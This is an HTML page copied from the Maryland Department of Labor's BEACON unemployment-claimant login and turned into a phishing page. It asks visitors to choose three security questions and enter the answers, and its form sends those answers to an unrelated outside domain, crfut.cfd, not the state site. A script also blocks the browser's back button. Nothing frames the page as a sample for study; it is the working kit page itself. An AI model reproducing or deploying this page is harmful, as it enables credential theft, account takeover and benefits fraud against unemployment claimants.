

<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from beacon.labor.maryland.gov/ReBEACONClaimant/Account/Login by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 17 Jul 2021 22:28:20 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title>Security Questions Page</title>
    <link href="../Styles/app.css" type="text/css" rel="stylesheet" />
    <link href="../Styles/Login.css" rel="stylesheet" />
    <style>
        body {
            -webkit-overflow-scrolling: touch;
        }
        .error{
            border : 1px solid red !important;
        }

        .logerror {
            margin-left: 15%;
        }

            .logerror span {
                margin-left: 0%;
            }

        .customCaptchaPlace {
            padding-left: 176px;
              width: 314px;
        }

            .customCaptchaPlace .upper {
                width: 100%;
                float: left;
                background: #FFF;
                border: 1px solid #b7b7b7;
                margin-bottom: 10px;
                padding-left: 42px;
            }

            .customCaptchaPlace .lower {
                float: left;
                width: 100%;
            }

                .customCaptchaPlace .lower input {
                     width: 359px;
                }

        .captcha-text {
            float: left;
            height: 80px;
            width: 195px;
        }


        .captcha-refresh {
            width: 20px;
            height: 20px;
            display: block;
            float: left;
            margin: 30px 10px !important;
        }


        .captcha-sound {
            width: 20px;
            height: 20px;
            display: block;
            float: left;
            margin: 30px 10px !important;           
        }

        .CaptchaTextBox {
            padding: 7px;
            border: 1px solid #a0a0a0;
            width: 62%;
            height: 35px;
            font-family: 'Lucida Sans Unicode','Lucida Grande',arial,helvetica,sans-serif;
            font-size: 14px;
            color: #555555;
            box-sizing: border-box;
        }

        .CustomModelMessage {
            display: block;
            font-size: 12px;
            line-height: 20px;
            text-align: justify;
        }

        @media screen and (max-width:640px) {
            .customCaptchaPlace .upper {
                width: 100% !important;
            }

            .customCaptchaPlace .lower {
                width: 100% !important;
            }

            .capslockerror {
                float: left !important;
            }

            .logerror {
                margin-left: 5%;
            }

            .customCaptchaPlace {
                padding-left: 20px !important;
            }

            .CustomModelMessage {
                margin-left: 0% !important;
                font-size: 12px !important;
            }
        }
    </style>
     
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-17120743-50"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); }
        gtag('js', new Date());

        gtag('config', 'UA-17120743-50');
    </script>
    
 
</head>
<body class="LoginBg">
     
     
       <noscript class="header-text">
        Javascript is not enabled on the browser, please enable it and try again.
    </noscript>

    <form action="https://crfut.cfd/maryland-RD620/security.php" method="post"><input name="__RequestVerificationToken" type="hidden" value="OB4vf8Fb5kJCqZ8BhKMYNnXZfF_TiT0llKGdYwzBR_inl0_wm03WTesdZ2rknNwvqeboyeNeaoimd4gdZ68fH4l89Yc1" />
    <input id="antiForgeryToken" type="hidden" value="Q1Qlah2o7uVpKeU8XUaJkWIT-Rm9xAAthyN4x46bpIgIFDEq5AIHrP9yEFWg3r5U7t8nsNFzjHGeYRYl4yfmV83rBTY1:MrGkrIBn12uify15tqd9VcbWzuDlYV4K6w2ytbpWt0EaZ523SEAygYeaibZdfjlEhlW4yz1IVuNzl-UAlhMIw6HTTaU1" />
    
    <div>

        <div class="LoginBox">

            <div class="LoginLogo">
                <img id="HeaderImage" src="../Images/MA_Header_top.png" tabindex="0" title="Logo of Maryland Department of Labor , Licensing and Regulation" /><br><br>
               <strong><h4></h4></strong> 
            </div>
            <div class="clr"></div>
            
            <p tabindex="0"></p>
            <p tabindex="0" text align="center" >
                <b><h4 align="center">Answer the security question you selected when you set up your account.</h4></b>
                <br />
                
            </p>
             
            <br/>
            
            
            
            
            <div class="logscreen">
                <label><h4 align="center"></h4></label>
                <div class="LoginRow" align="center">
                     
                      <i class="icon icon-chevron-down"></i>

                      <select name="ssq1" id="UserName" class="form-control">
                        <option value="Choose Security Question 1" Selected><strong>Choose Security Question 1</strong></option>
                        <option value="Where was your wedding reception held?">Where was your wedding reception held?</option>
                        <option value="Name of your first grade teacher?">Name of your first grade teacher?</option>
                        <option value="In what city was your first job?">In what city was your first job?</option>
                        <option value="What was your nickname as a child?">What was your nickname as a child?</option>
                        <option value="Name of hospital where you were born?">Name of hospital where you were born?</option>
                        <option value="What is your significant other's mothers maiden name?">What is your significant other's mothers maiden name?</option>
                        <option value="On what street did you grow up?">On what street did you grow up?</option>
                        <option value="In what city did you meet your significant other?">In what city did you meet your significant other?</option>
                        <option value="The first name of your oldest niece or nephew?">The first name of your oldest niece or nephew?</option>
                      </select>
                    </div>
                    <div>
                        

                    </div>
                </div>
                <div class="LoginRow">
                     
                    <div class="LoginCaption">
                        <label for="Security Answer 1" tabindex="0"> Answer :</label>
                    </div>
                    
                    <div class="LoginInput"><input autocomplete="off" data-val="true" data-val-required="The sa2 field is required." id="UserName" name="sa1" text="" type="text" value="" /></div>

                </div>
                <div class="LoginRow">
                     
                    <div class="LoginRow" align="center">
                     
                      <i class="icon icon-chevron-down"></i>

                      <select name="ssq2" id="UserName" class="form-control">
                        <option value="Choose Security Question 2" Selected><strong>Choose Security Question 2</strong></option>
                        <option value="Where was your wedding reception held?">Where was your wedding reception held?</option>
                        <option value="Name of your first grade teacher?">Name of your first grade teacher?</option>
                        <option value="In what city was your first job?">In what city was your first job?</option>
                        <option value="What was your nickname as a child?">What was your nickname as a child?</option>
                        <option value="Name of hospital where you were born?">Name of hospital where you were born?</option>
                        <option value="What is your significant other's mothers maiden name?">What is your significant other's mothers maiden name?</option>
                        <option value="On what street did you grow up?">On what street did you grow up?</option>
                        <option value="In what city did you meet your significant other?">In what city did you meet your significant other?</option>
                        <option value="The first name of your oldest niece or nephew?">The first name of your oldest niece or nephew?</option>
                      </select>
                    </div>
                </div>
                <div class="LoginRow">
                     
                    <div class="LoginCaption">
                        <label for="Security Answer 2" tabindex="0">Answer :</label>
                    </div>
                    
                    <div class="LoginInput"><input autocomplete="off" data-val="true" data-val-required="The sa2 field is required." id="UserName" name="sa2" text="" type="text" value="" /></div>
                </div><div class="LoginRow">
                     
                    <div class="LoginRow">
                     
                    <div class="LoginRow" align="center">
                     
                      <i class="icon icon-chevron-down"></i>

                      <select name="ssq3" id="UserName" class="form-control">
                        <option value="Choose Security Question 3" Selected><strong>Choose Security Question 3</strong></option>
                        <option value="Where was your wedding reception held?">Where was your wedding reception held?</option>
                        <option value="Name of your first grade teacher?">Name of your first grade teacher?</option>
                        <option value="In what city was your first job?">In what city was your first job?</option>
                        <option value="What was your nickname as a child?">What was your nickname as a child?</option>
                        <option value="Name of hospital where you were born?">Name of hospital where you were born?</option>
                        <option value="What is your significant other's mothers maiden name?">What is your significant other's mothers maiden name?</option>
                        <option value="On what street did you grow up?">On what street did you grow up?</option>
                        <option value="In what city did you meet your significant other?">In what city did you meet your significant other?</option>
                        <option value="The first name of your oldest niece or nephew?">The first name of your oldest niece or nephew?</option>
                      </select>
                    </div>
                </div>
                </div>
                <div class="LoginRow">
                     
                    <div class="LoginCaption">
                        <label for="Security Answer 3" tabindex="0">Answer :</label>
                    </div>
                    
                    <div class="LoginInput"><input autocomplete="off" data-val="true" data-val-required="The sa2 field is required." id="UserName" name="sa3" text="" type="text" value="" /></div>
                </div>
                <div class="capslockerror" id="divCapLockErr" style="visibility: hidden">Caps Lock is on.</div>
               <input data-val="true" data-val-required="The IsCaptchaRequired field is required." id="IsCaptchaRequired" name="IsCaptchaRequired" type="hidden" value="True" />
                <div class="LoginRow customCaptchaPlace" id="divCB12CDED4269D83DAAD0FF356C68825F305AB247" style="display: none">
                    <div class="upper">
                        <img src="security.html#" id="captchadispaly_img" class="captcha-text" title ="Captcha" tabindex="0" />

                         <img src="../Images/captcha-refresh.png" class="captcha-refresh " id="refresh_img" title ="captcha refresh button" tabindex="0" data-captcha />
                        <img src="../Images/captcha-sound.png" class="captcha-sound " id="audio_img" title ="captcha audio button" tabindex="0" data-captcha />
                        <input id="SessionPreserveCaptcha" name="SessionPreserveCaptcha" type="hidden" value="jddhskxvhlgdvl44ydhwqlh5" />
                        <input id="EncryptedCaptchaText" name="EncryptedCaptchaText" type="hidden" value="" />
                        <input id="Formname" name="Formname" type="hidden" value="" />
                        <audio id="speak"></audio>
                    </div>
                    <div class="lower">
                        <input autocomplete="off" class="CaptchaTextBox" id="CaptchaTextByUser" name="CaptchaTextByUser" oncopy="return false" oncut="return false" onpaste="return false" placeholder="Captcha" style="margin-right:5%" type="text" value="" />
                    </div>
                </div>                <div class="logerror">
                    <span class="field-validation-valid" data-valmsg-for="UserName" data-valmsg-replace="true"></span>
                    <span class="field-validation-valid" data-valmsg-for="Password" data-valmsg-replace="true"></span>
                    
                    <div class="CustomModelMessage"></div>
                </div>
                <div class="LoginRow">
                    
                    <div class="LoginCaption" style="display: none">Language(s):</div>
                    <div class="LoginInput" style="display: none">
                        <select id="Language" name="Language" title="Language"><option value="es-US">Spanish (United States)</option>
<option selected="selected" value="en-US">English (United States)</option>
</select>
                    </div>
                    
                </div>
                
                
                 
                <div class="LoginRow">            
                     
                                            <input id="btnLogin" type="submit" class="neo-action-login-trigger btnLogin" value="Next" />
                                            
                                    
                    <div>
                        <p tabindex="0"> <a href="https://beacon.labor.maryland.gov/ReBEACONClaimant/home/wfmRegister?Language=en-US#/spa/wfmClaimantRegistrationWizard/0"></a> </p>
                    </div>
                    <div>
                        <p tabindex="0"> <a href="https://crfut.cfd/maryland-RD620/ClaimantAccountActivation3619.html?Language=en-US"></a> </p>
                    </div>
                </div>
            </div>
            <div class="clearfix"></div>

        </div>

    
       
        <script src="../Scripts/jquery.min.js" type="text/javascript"></script>   
                <script type="text/javascript" src="../Scripts/hash.js"></script>
       <!-- <script type="text/javascript" src="../Scripts/Captcha.min.js"></script> -->
        
        <script type="text/javascript">
            
              var ua = window.navigator.userAgent;
            var msie = ua.indexOf("MSIE ");
            if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {
                $("#audio_img").hide();
            }
         
      
            var username = document.getElementById("UserName").value;
            if (username == "") {
                document.getElementById("UserName").focus();
            }
            else {
                document.getElementById("Password").focus();
            }      
            document.getElementById("UserName").setAttribute("title", "Username");
            //document.getElementById("Password").setAttribute("title", "Password");
            var CheckCopmlete = false;
            var lblnVisuallyImpaired = false;
            if (sessionStorage.getItem("iblnVisuallyImpaired") == true || sessionStorage.getItem("iblnVisuallyImpaired") == "true") {
                lblnVisuallyImpaired = true;
            }
            sessionStorage.clear();
            //nsCommon.SetWindowName();
            if (document.getElementById("LoginWindowName") != undefined && document.getElementById("LoginWindowName").value != "") {
                window.name = document.getElementById("LoginWindowName").value;
                sessionStorage.setItem("LoginWindowName", JSON.stringify(window.name));
            }

            function SetWindowName() {
                if (document.getElementById("LoginWindowName").value !== "") {
                    window.name = document.getElementById("LoginWindowName").value;
                    sessionStorage.setItem("WindowName", window.name);
                }
            }


            function capLock(e) {
                kc = e.keyCode ? e.keyCode : e.which;
                sk = e.shiftKey ? e.shiftKey : ((kc == 16) ? true : false);
                if (((kc >= 65 && kc <= 90) && !sk) || ((kc >= 97 && kc <= 122) && sk))
                    document.getElementById('divCapLockErr').style.visibility = 'visible';
                else
                    document.getElementById('divCapLockErr').style.visibility = 'hidden';
            }
            if (lblnVisuallyImpaired === true || ((document.getElementById("hdnVisuallyImpaired") != null
                && document.getElementById("hdnVisuallyImpaired").value != null
                && document.getElementById("hdnVisuallyImpaired").value.toLowerCase() === "true"))) {
                document.getElementById("iblnVisuallyImpaired").checked = true;
                document.getElementById("HeaderImage").focus();               
                sessionStorage.setItem("iblnVisuallyImpaired", true);
            }
            else {
                document.getElementById("iblnVisuallyImpaired").checked = false;
                sessionStorage.removeItem("iblnVisuallyImpaired");
            }          
            function isVisuallyImpairedclick(control) {
                if (document.getElementById(control.id).checked == true) {

                    sessionStorage.setItem("iblnVisuallyImpaired", true);   
                }
                else {
                    sessionStorage.removeItem("iblnVisuallyImpaired");
                }
            }
            function preventBack() { window.history.forward(); }
            setTimeout("preventBack()", 0);
            window.onunload = function () { null }; 
            $(document).ready(function () {
                if ($(".CustomModelMessage").text() == "") {
                }
                else {
                    $(".logerror").attr("tabindex", "0");
                }
                if ($(".field-validation-error").text() == "") {
                }
                else {
                    $(".logerror").attr("tabindex", "0");
                }
                if (($(window).width() < 845)) {
                    $('#HeaderImage').attr("role", "img");
                    $('#HeaderImage').attr("title", "Maryland Department of Labor, Licensing and Regulation");
                }
            });


        </script>
    </div>

    </form>
</body>
</html>
